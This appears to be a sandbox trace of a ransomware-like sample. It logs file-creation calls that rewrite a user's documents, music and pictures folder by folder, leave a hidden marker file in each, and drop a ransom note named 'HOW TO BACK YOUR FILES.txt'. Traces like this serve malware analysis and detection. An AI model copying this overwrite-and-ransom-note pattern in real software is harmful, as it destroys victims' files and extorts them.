Create C:\Documents and Settings\FD1HVy\My Documents\vJlQBx.xls desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\vMA Qdvy.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\X08ymPxkbPs3266F.docx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\YCOQqj5kQ9XpLXm.xlsx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\kkcie@kdj.kd.pst desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\Favorites.vssx desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\folder.ico desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\AP 8gy4K.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\hgiHJqZpAffsk9Ayx5.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\Ih S7fXaLxmtXo.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\xIKve1epy5TaSZNBJO.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\BAaa3e1h2lTJYNIOURr.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\m3q-E9nfMbEgYl1Pe.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Te_ga.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Vpn2Jrp.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\_zhgc_Z.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\DxCsbzDxs.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\y-gmiZ3EVZAMHBqa.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\8a15c9EmXZUQkn3yZLSu.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\jIzljgerjD3abNZk.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\rHULW.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\Z47-Ha4h.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\9iPxYg1O.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\zin-T7pL1d07aj.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\n7-N9O.mp3 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\sMCkH-pugJ7KJz.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\XBdTL-CUh-k.wav desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\QNvdrxGyuyXkTr.m4a desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
